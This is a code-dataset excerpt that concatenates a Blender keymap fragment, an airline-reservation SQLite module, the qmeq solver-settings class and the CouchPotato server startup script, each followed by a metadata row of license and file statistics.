km = kc.keymaps.new('Transform Modal Map', space_type='EMPTY', region_type='WINDOW', modal=True)
kmi = km.keymap_items.new_modal('CANCEL', 'ESC', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'LEFTMOUSE', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'RET', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'NUMPAD_ENTER', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('TRANSLATE', 'G', 'PRESS')
kmi = km.keymap_items.new_modal('ROTATE', 'R', 'PRESS')
kmi = km.keymap_items.new_modal('RESIZE', 'S', 'CLICK')
kmi = km.keymap_items.new_modal('SNAP_TOGGLE', 'TAB', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('SNAP_INV_ON', 'LEFT_CTRL', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_OFF', 'LEFT_CTRL', 'RELEASE', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_ON', 'RIGHT_CTRL', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_OFF', 'RIGHT_CTRL', 'RELEASE', any=True)
kmi = km.keymap_items.new_modal('ADD_SNAP', 'A', 'PRESS')
kmi = km.keymap_items.new_modal('REMOVE_SNAP', 'A', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'PAGE_UP', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'PAGE_DOWN', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'PAGE_UP', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'PAGE_DOWN', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'WHEELDOWNMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'WHEELUPMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'WHEELUPMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE', 'TRACKPADPAN', 'ANY')
kmi = km.keymap_items.new_modal('EDGESLIDE_EDGE_NEXT', 'WHEELDOWNMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('EDGESLIDE_PREV_NEXT', 'WHEELUPMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_UP', 'PAGE_UP', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_DOWN', 'PAGE_DOWN', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_UP', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_DOWN', 'WHEELUPMOUSE', 'PRESS', shift=True)
# Map Gesture Border
km = kc.keymaps.new('Gesture Border', space_type='EMPTY', region_type='WINDOW', modal=True)
kmi = km.keymap_items.new_modal('CANCEL', 'ESC', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('BEGIN', 'LEFTMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('SELECT', 'LEFTMOUSE', 'RELEASE')
kmi = km.keymap_items.new_modal('SELECT', 'LEFTMOUSE', 'RELEASE', shift=True)
kmi = km.keymap_items.new_modal('DESELECT', 'LEFTMOUSE', 'RELEASE', ctrl=True)
| gpl-2.0 | -9,156,502,979,376,254,000 | 63.175573 | 106 | 0.708517 | false | 2.716756 | false | false | false |
YOUR-WORST-TACO/AdvPythonProject | Program/airDB/db.py | 1 | 7946 | """
AIRLINE RESERVATION SYSTEM
DEVELOPERS
Stephen Tafoya
Ryan Hamilton
DATABASE MODULE - MANAGES AIRPORT AND FLIGHT STORAGE
"""
import sqlite3 # ST Import database management
class AirDB(object): # ST
"""
class DB(db)
documentation:
class that handles main database management,
will handle all database operations
"""
# Initializer
def __init__(self, db): # ST
con = self.connectDB(db) # ST
if con is not None: # ST
self.connection = con # ST
self.cursor = self.connection.cursor() # ST
self.setupDB() # ST
def connectDB(self, db): # ST
"""
connectDB
-- create simplified function with error handling
-- to be used externally
-- returns a connection or None
"""
try:
conn = sqlite3.connect(db) # ST connect to database specified
return conn # ST return connection
except sqlite3.Error as e: # ST catch all sqlite3 errors
print(e) # ST display error
return None # ST return None
def setupDB(self): # ST makes sure the db has correct table
self.cursor.execute('''CREATE TABLE IF NOT EXISTS AIRPORTS (
id integer PRIMARY KEY AUTOINCREMENT,
country text NOT NULL,
state text NOT NULL,
airport text NOT NULL
)''') # ST
def insertAirport(self, query): # ST
"""
adds a new index to airports
should be tuple of format
(country, state, airport)
"""
datastr = '''INSERT INTO AIRPORTS(country,state,airport) VALUES(?,?,?)'''
try:
self.cursor.execute(datastr, query) # ST attempt to querry
except sqlite3.Error as e: # ST catch error
print(e, "failed") # ST display error
def insertAirports(self, table): # ST calls insertAirport with table
for query in table: # ST for each element in table
self.insertAirport(query) # ST insert airport
def loadCountries(self): # RH loads all countries in database
        # DISTINCT: one entry per country, not one per airport row.
        self.cursor.execute('SELECT DISTINCT country FROM AIRPORTS') # RH
all_countries = self.cursor.fetchall() # RH
countries = [] # RH
for i in range(0, len(all_countries)): # RH
temp_var = all_countries[i][0] # RH
countries.append(temp_var) # RH
return countries # RH
def loadStates(self, country): # RH
# Loads all states in database that are in a given country
        self.cursor.execute('SELECT DISTINCT state FROM AIRPORTS WHERE country = ?', # RH
                            (country,)) # RH
all_states = self.cursor.fetchall() # RH
states = []
for i in range(0, len(all_states)): # RH
temp_var = all_states[i][0] # RH
states.append(temp_var) # RH
return states # RH
def loadAirports(self, state): # RH
# Loads all airports in database that are in a given state
        self.cursor.execute('SELECT airport FROM AIRPORTS WHERE state = ?', # RH
                            (state,))
all_airports = self.cursor.fetchall() # RH
airports = [] # RH
for i in range(0, len(all_airports)): # RH
temp_var = all_airports[i][0] # RH
airports.append(temp_var) # RH
return airports # RH
def findAirport(self, airport): # ST
self.cursor.execute("SELECT id FROM AIRPORTS WHERE airport = ?", (airport,))
val = self.cursor.fetchall() # ST
        if val: # ST guard: an empty result would otherwise raise IndexError
            return val[0][0] # ST
        return -1 # ST
def close(self): # ST
self.connection.commit() # ST sync all changes
self.connection.close() # ST close db
class FlightDB(object): # RH
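    # Handles the booking side of the database: a FLIGHTS table plus a
    # PASSENGERS table keyed to flights through flight_id.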
# Initializer
def __init__(self, db): # RH
con = self.connectDB(db) # RH
if con is not None: # RH
self.connection = con # RH
self.cursor = self.connection.cursor() # RH
self.setupDB() # RH
def connectDB(self, db): # RH
"""
connectDB
-- create simplified function with error handling
-- to be used externally
-- returns a connection or None
"""
try:
conn = sqlite3.connect(db) # RH connect to database specified
return conn # RH return connection
except sqlite3.Error as e: # RH catch all sqlite3 errors
print(e) # RH display error
return None # RH return None
def setupDB(self): # RH
self.cursor.execute('''CREATE TABLE IF NOT EXISTS FLIGHTS (
id integer PRIMARY KEY AUTOINCREMENT,
start int NOT NULL,
stop int NOT NULL,
flight_spec text NOT NULL,
address text NOT NULL,
billing_address text,
cost real NOT NULL,
payment_type int NOT NULL,
payment_card text
)''') # ST
self.cursor.execute('''CREATE TABLE IF NOT EXISTS PASSENGERS (
id integer PRIMARY KEY AUTOINCREMENT,
flight_id integer NOT NULL,
name text NOT NULL,
bags integer NOT NULL,
seating text NOT NULL
)''') # ST
def nextIndex(self):
        # Row count doubles as the next index; assumes ids stay contiguous
        # (no deleted rows).
        self.cursor.execute("SELECT COUNT(*) FROM FLIGHTS")
        return self.cursor.fetchone()[0]
def insertFlight(self, query): # RH
# adds a new index to the flights table in the database.
data = '''INSERT INTO FLIGHTS(start, stop, flight_spec, address, billing_address, cost, payment_type, payment_card) VALUES(?, ?, ?, ?, ?, ?, ?, ?)'''
try: # RH
self.cursor.execute(data, query) # RH
except sqlite3.Error as e: # RH
print(e, "failed") # RH
def insertFlights(self, table): # RH
for query in table: # RH
self.insertFlight(query) # RH
def insertPassenger(self, query): # RH
        # adds a new index to the passengers table in the database
data = '''INSERT INTO PASSENGERS(flight_id, name, bags, seating) VALUES(?, ?, ?, ?)'''
try:
self.cursor.execute(data, query) # RH
except sqlite3.Error as e: # RH
print(e, "failed") # RH
    def insertPassengers(self, table): # RH
for query in table: # RH
self.insertPassenger(query) # RH
def loadFlights(self): # RH
# pulls flights table from database and prints it for display
        self.cursor.execute('SELECT * FROM FLIGHTS') # RH
all_flights = self.cursor.fetchall() # RH
print(all_flights) # RH
    def loadPassengers(self): # RH
        # pulls passengers table from database and prints it for display
        self.cursor.execute('SELECT * FROM PASSENGERS') # RH
all_passengers = self.cursor.fetchall() # RH
print(all_passengers) # RH
def close(self): # RH
self.connection.commit() # RH
self.connection.close() # RH
def main():
pass
if __name__ == "__main__":
main()
| gpl-3.0 | -7,582,402,227,697,296,000 | 36.305164 | 157 | 0.507425 | false | 4.162389 | false | false | false |
gedaskir/qmeq | qmeq/builder/funcprop.py | 1 | 5038 | """Module containing FunctionProperties class."""
class FunctionProperties(object):
"""
Class containing miscellaneous variables for Approach and Approach2vN classes.
Attributes
----------
symq : bool
For symq=False keep all equations in the kernel, and the matrix is of size N by N+1.
For symq=True replace one equation by the normalisation condition,
and the matrix is square N by N.
norm_row : int
If symq=True this row will be replaced by normalisation condition in the kernel matrix.
solmethod : string
String specifying the solution method of the equation L(Phi0)=0.
The possible values are matrix inversion 'solve' and least squares 'lsqr'.
Method 'solve' works only when symq=True.
For matrix free methods (used when mfreeq=True) the possible values are
'krylov', 'broyden', etc.
itype : int
Type of integral for first order approach calculations.
itype=0: the principal parts are evaluated using Fortran integration package QUADPACK \
routine dqawc through SciPy.
itype=1: the principal parts are kept, but approximated by digamma function valid for \
large bandwidth D.
itype=2: the principal parts are neglected.
itype=3: the principal parts are neglected and infinite bandwidth D is assumed.
dqawc_limit : int
For itype=0 dqawc_limit determines the maximum number of sub-intervals
in the partition of the given integration interval.
mfreeq : bool
If mfreeq=True the matrix free solution method is used for first order methods.
phi0_init : array
For mfreeq=True the initial value of zeroth order density matrix elements.
mtype_qd : float or complex
Type for the many-body quantum dot Hamiltonian matrix.
mtype_leads : float or complex
Type for the many-body tunneling matrix Tba.
kpnt_left, kpnt_right : int
Number of points Ek_grid is extended to the left and the right for '2vN' approach.
ht_ker : array
Kernel used when performing Hilbert transform using FFT.
It is generated using specfunc.kernel_fredriksen(n).
emin, emax : float
Minimal and maximal energy in the updated Ek_grid generated by neumann2py.get_grid_ext(sys).
Note that emin<=Dmin and emax>=Dmax.
dmin, dmax : float
Bandedge Dmin and Dmax values of the lead electrons.
ext_fct : float
Multiplication factor used in neumann2py.get_grid_ext(sys), when determining emin and emax.
suppress_err : bool
Determines whether to print the warning when the inversion of the kernel failed.
    off_diag_corrections : bool
        Determines whether to include first order off-diagonal corrections
        to the kernel in the RTD approach.
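    Examples
    --------
    Illustrative only (argument names as defined in ``__init__``)::
        funcp = FunctionProperties(kerntype='Pauli', symq=True, itype=1)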
"""
def __init__(self,
kerntype='2vN', symq=True, norm_row=0, solmethod=None,
itype=0, dqawc_limit=10000, mfreeq=False, phi0_init=None,
mtype_qd=float, mtype_leads=complex, kpnt=None, dband=None,
off_diag_corrections=True):
self.kerntype = kerntype
self.symq = symq
self.norm_row = norm_row
self.solmethod = solmethod
#
self.itype = itype
self.dqawc_limit = dqawc_limit
#
self.mfreeq = mfreeq
self.phi0_init = phi0_init
#
self.mtype_qd = mtype_qd
self.mtype_leads = mtype_leads
#
self.kpnt = kpnt
self.dband = dband
#
self.kpnt_left = 0
self.kpnt_right = 0
self.ht_ker = None
#
self.dmin, self.dmax = 0, 0
self.emin, self.emax = 0, 0
self.ext_fct = 1.1
#
self.suppress_err = False
self.suppress_wrn = [False]
#
self.off_diag_corrections = off_diag_corrections
def print_error(self, exept):
if not self.suppress_err:
print("WARNING: Could not solve the linear set of equations.\n" +
" Error from the solver: " + str(exept) + "\n"
" The reasons for such a failure can be various:\n" +
" 1. Some of the transport channels may be outside the bandwidth D of the leads.\n" +
" In this case removing some of the states with the method [remove_states()] will help.\n" +
" 2. Replacement of one of the equations with the normalisation condition.\n" +
" In this case try to use different [norm_row]\n"+
" or solve the linear system using [symq=False] and the solution method [solmethod='lsqr'].\n"
" This warning will not be shown again.\n"
" To check if the solution succeeded check the property [success].")
self.suppress_err = True
def print_warning(self, i, message):
if not self.suppress_wrn[i]:
print(message)
self.suppress_wrn[i] = True
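# Example (editor's sketch, not part of the qmeq source): constructing the
# properties object with a few non-default options; the keyword names match
# the __init__ signature above, the numeric values are placeholders.
#
#   props = FunctionProperties(kerntype='2vN', symq=True, itype=1,
#                              kpnt=257, dband=100.0)
#   props.print_warning(0, 'Ek_grid was extended beyond the lead bandwidth.')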
| bsd-2-clause | -3,665,908,777,324,899,000 | 43.982143 | 116 | 0.62505 | false | 3.960692 | false | false | false |
kthordarson/CouchPotatoServer | couchpotato/runner.py | 28 | 12513 | from logging import handlers
from uuid import uuid4
import locale
import logging
import os.path
import sys
import time
import traceback
import warnings
import re
import tarfile
import shutil
from CodernityDB.database_super_thread_safe import SuperThreadSafeDatabase
from argparse import ArgumentParser
from cache import FileSystemCache
from couchpotato import KeyHandler, LoginHandler, LogoutHandler
from couchpotato.api import NonBlockHandler, ApiHandler
from couchpotato.core.event import fireEventAsync, fireEvent
from couchpotato.core.helpers.encoding import sp
from couchpotato.core.helpers.variable import getDataDir, tryInt, getFreeSpace
import requests
from requests.packages.urllib3 import disable_warnings
from tornado.httpserver import HTTPServer
from tornado.web import Application, StaticFileHandler, RedirectHandler
def getOptions(args):
# Options
parser = ArgumentParser(prog = 'CouchPotato.py')
parser.add_argument('--data_dir',
dest = 'data_dir', help = 'Absolute or ~/ path of the data dir')
parser.add_argument('--config_file',
dest = 'config_file', help = 'Absolute or ~/ path of the settings file (default DATA_DIR/settings.conf)')
parser.add_argument('--debug', action = 'store_true',
dest = 'debug', help = 'Debug mode')
parser.add_argument('--console_log', action = 'store_true',
dest = 'console_log', help = "Log to console")
parser.add_argument('--quiet', action = 'store_true',
dest = 'quiet', help = 'No console logging')
parser.add_argument('--daemon', action = 'store_true',
dest = 'daemon', help = 'Daemonize the app')
parser.add_argument('--pid_file',
dest = 'pid_file', help = 'Path to pidfile needed for daemon')
options = parser.parse_args(args)
data_dir = os.path.expanduser(options.data_dir if options.data_dir else getDataDir())
if not options.config_file:
options.config_file = os.path.join(data_dir, 'settings.conf')
if not options.pid_file:
options.pid_file = os.path.join(data_dir, 'couchpotato.pid')
options.config_file = os.path.expanduser(options.config_file)
options.pid_file = os.path.expanduser(options.pid_file)
return options
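# Example (editor's sketch): parsing a typical command line; the paths are
# placeholders.
#
#   options = getOptions(['--data_dir', '~/.couchpotato', '--console_log'])
#   print(options.config_file)  # -> /home/<user>/.couchpotato/settings.conf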
# Tornado monkey patch logging..
def _log(status_code, request):
    if status_code < 400:
        return
    log_method = logging.debug
request_time = 1000.0 * request.request_time()
summary = request.method + " " + request.uri + " (" + \
request.remote_ip + ")"
log_method("%d %s %.2fms", status_code, summary, request_time)
def runCouchPotato(options, base_path, args, data_dir = None, log_dir = None, Env = None, desktop = None):
try:
locale.setlocale(locale.LC_ALL, "")
encoding = locale.getpreferredencoding()
except (locale.Error, IOError):
encoding = None
# for OSes that are poorly configured I'll just force UTF-8
if not encoding or encoding in ('ANSI_X3.4-1968', 'US-ASCII', 'ASCII'):
encoding = 'UTF-8'
Env.set('encoding', encoding)
# Do db stuff
db_path = sp(os.path.join(data_dir, 'database'))
old_db_path = os.path.join(data_dir, 'couchpotato.db')
# Remove database folder if both exists
if os.path.isdir(db_path) and os.path.isfile(old_db_path):
db = SuperThreadSafeDatabase(db_path)
db.open()
db.destroy()
# Check if database exists
db = SuperThreadSafeDatabase(db_path)
db_exists = db.exists()
if db_exists:
# Backup before start and cleanup old backups
backup_path = sp(os.path.join(data_dir, 'db_backup'))
backup_count = 5
existing_backups = []
if not os.path.isdir(backup_path): os.makedirs(backup_path)
for root, dirs, files in os.walk(backup_path):
# Only consider files being a direct child of the backup_path
if root == backup_path:
for backup_file in sorted(files):
                    ints = re.findall(r'\d+', backup_file)
# Delete non zip files
if len(ints) != 1:
try: os.remove(os.path.join(root, backup_file))
except: pass
else:
existing_backups.append((int(ints[0]), backup_file))
else:
# Delete stray directories.
shutil.rmtree(root)
# Remove all but the last 5
for eb in existing_backups[:-backup_count]:
os.remove(os.path.join(backup_path, eb[1]))
# Create new backup
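        # The archive is named after the current Unix timestamp, e.g.
        # db_backup/1436728032.tar.gz, with all files stored under 'database/'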
new_backup = sp(os.path.join(backup_path, '%s.tar.gz' % int(time.time())))
zipf = tarfile.open(new_backup, 'w:gz')
for root, dirs, files in os.walk(db_path):
for zfilename in files:
zipf.add(os.path.join(root, zfilename), arcname = 'database/%s' % os.path.join(root[len(db_path) + 1:], zfilename))
zipf.close()
# Open last
db.open()
else:
db.create()
# Force creation of cachedir
log_dir = sp(log_dir)
cache_dir = sp(os.path.join(data_dir, 'cache'))
python_cache = sp(os.path.join(cache_dir, 'python'))
if not os.path.exists(cache_dir):
os.mkdir(cache_dir)
if not os.path.exists(python_cache):
os.mkdir(python_cache)
session = requests.Session()
session.max_redirects = 5
# Register environment settings
Env.set('app_dir', sp(base_path))
Env.set('data_dir', sp(data_dir))
Env.set('log_path', sp(os.path.join(log_dir, 'CouchPotato.log')))
Env.set('db', db)
Env.set('http_opener', session)
Env.set('cache_dir', cache_dir)
Env.set('cache', FileSystemCache(python_cache))
Env.set('console_log', options.console_log)
Env.set('quiet', options.quiet)
Env.set('desktop', desktop)
Env.set('daemonized', options.daemon)
Env.set('args', args)
Env.set('options', options)
# Determine debug
debug = options.debug or Env.setting('debug', default = False, type = 'bool')
Env.set('debug', debug)
# Development
development = Env.setting('development', default = False, type = 'bool')
Env.set('dev', development)
# Disable logging for some modules
for logger_name in ['enzyme', 'guessit', 'subliminal', 'apscheduler', 'tornado', 'requests']:
logging.getLogger(logger_name).setLevel(logging.ERROR)
for logger_name in ['gntp']:
logging.getLogger(logger_name).setLevel(logging.WARNING)
# Disable SSL warning
disable_warnings()
# Use reloader
reloader = debug is True and development and not Env.get('desktop') and not options.daemon
# Logger
logger = logging.getLogger()
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s', '%m-%d %H:%M:%S')
level = logging.DEBUG if debug else logging.INFO
logger.setLevel(level)
logging.addLevelName(19, 'INFO')
# To screen
if (debug or options.console_log) and not options.quiet and not options.daemon:
hdlr = logging.StreamHandler(sys.stderr)
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
# To file
hdlr2 = handlers.RotatingFileHandler(Env.get('log_path'), 'a', 500000, 10, encoding = Env.get('encoding'))
hdlr2.setFormatter(formatter)
logger.addHandler(hdlr2)
# Start logging & enable colors
# noinspection PyUnresolvedReferences
import color_logs
from couchpotato.core.logger import CPLog
log = CPLog(__name__)
log.debug('Started with options %s', options)
# Check available space
try:
total_space, available_space = getFreeSpace(data_dir)
if available_space < 100:
log.error('Shutting down as CP needs some space to work. You\'ll get corrupted data otherwise. Only %sMB left', available_space)
return
except:
log.error('Failed getting diskspace: %s', traceback.format_exc())
def customwarn(message, category, filename, lineno, file = None, line = None):
log.warning('%s %s %s line:%s', (category, message, filename, lineno))
warnings.showwarning = customwarn
# Create app
from couchpotato import WebHandler
web_base = ('/' + Env.setting('url_base').lstrip('/') + '/') if Env.setting('url_base') else '/'
Env.set('web_base', web_base)
api_key = Env.setting('api_key')
if not api_key:
api_key = uuid4().hex
Env.setting('api_key', value = api_key)
api_base = r'%sapi/%s/' % (web_base, api_key)
Env.set('api_base', api_base)
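    # e.g. '/api/<32 character hex key>/' when no url_base is configured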
# Basic config
host = Env.setting('host', default = '0.0.0.0')
host6 = Env.setting('host6', default = '::')
config = {
'use_reloader': reloader,
'port': tryInt(Env.setting('port', default = 5050)),
'host': host if host and len(host) > 0 else '0.0.0.0',
'host6': host6 if host6 and len(host6) > 0 else '::',
'ssl_cert': Env.setting('ssl_cert', default = None),
'ssl_key': Env.setting('ssl_key', default = None),
}
# Load the app
application = Application(
[],
log_function = lambda x: None,
debug = config['use_reloader'],
gzip = True,
cookie_secret = api_key,
login_url = '%slogin/' % web_base,
)
Env.set('app', application)
# Request handlers
application.add_handlers(".*$", [
(r'%snonblock/(.*)(/?)' % api_base, NonBlockHandler),
# API handlers
(r'%s(.*)(/?)' % api_base, ApiHandler), # Main API handler
(r'%sgetkey(/?)' % web_base, KeyHandler), # Get API key
(r'%s' % api_base, RedirectHandler, {"url": web_base + 'docs/'}), # API docs
# Login handlers
(r'%slogin(/?)' % web_base, LoginHandler),
(r'%slogout(/?)' % web_base, LogoutHandler),
# Catch all webhandlers
(r'%s(.*)(/?)' % web_base, WebHandler),
(r'(.*)', WebHandler),
])
# Static paths
static_path = '%sstatic/' % web_base
for dir_name in ['fonts', 'images', 'scripts', 'style']:
application.add_handlers(".*$", [
('%s%s/(.*)' % (static_path, dir_name), StaticFileHandler, {'path': sp(os.path.join(base_path, 'couchpotato', 'static', dir_name))})
])
Env.set('static_path', static_path)
# Load configs & plugins
loader = Env.get('loader')
loader.preload(root = sp(base_path))
loader.run()
# Fill database with needed stuff
fireEvent('database.setup')
if not db_exists:
fireEvent('app.initialize', in_order = True)
fireEvent('app.migrate')
# Go go go!
from tornado.ioloop import IOLoop
from tornado.autoreload import add_reload_hook
loop = IOLoop.current()
# Reload hook
def reload_hook():
fireEvent('app.shutdown')
add_reload_hook(reload_hook)
# Some logging and fire load event
try: log.info('Starting server on port %(port)s', config)
except: pass
fireEventAsync('app.load')
ssl_options = None
if config['ssl_cert'] and config['ssl_key']:
ssl_options = {
'certfile': config['ssl_cert'],
'keyfile': config['ssl_key'],
}
server = HTTPServer(application, no_keep_alive = True, ssl_options = ssl_options)
try_restart = True
restart_tries = 5
while try_restart:
try:
server.listen(config['port'], config['host'])
if Env.setting('ipv6', default = False):
try: server.listen(config['port'], config['host6'])
except: log.info2('Tried to bind to IPV6 but failed')
loop.start()
server.close_all_connections()
server.stop()
loop.close(all_fds = True)
except Exception as e:
log.error('Failed starting: %s', traceback.format_exc())
try:
nr, msg = e
if nr == 48:
log.info('Port (%s) needed for CouchPotato is already in use, try %s more time after few seconds', (config.get('port'), restart_tries))
time.sleep(1)
restart_tries -= 1
if restart_tries > 0:
continue
else:
return
except ValueError:
return
except:
pass
raise
try_restart = False
| gpl-3.0 | -5,350,388,513,148,154,000 | 33.282192 | 155 | 0.600575 | false | 3.743045 | true | false | false |